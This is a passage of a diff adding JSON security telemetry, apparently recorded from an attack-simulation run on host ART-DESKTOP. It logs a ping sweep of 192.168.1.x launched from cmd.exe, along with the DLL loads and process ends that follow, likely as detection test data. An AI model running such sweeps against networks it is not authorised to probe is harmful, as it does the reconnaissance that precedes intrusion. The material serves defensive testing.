"image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "process", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572881990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.183", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "process", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572886830000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.184", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1748, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "process", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572891830000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.185", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4832, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "process", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572896990000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.186", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572897130000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897300000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "process", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572901830000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.187", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "process", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572906830000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.188", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7836, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "process", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572911990000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.189", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3136, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 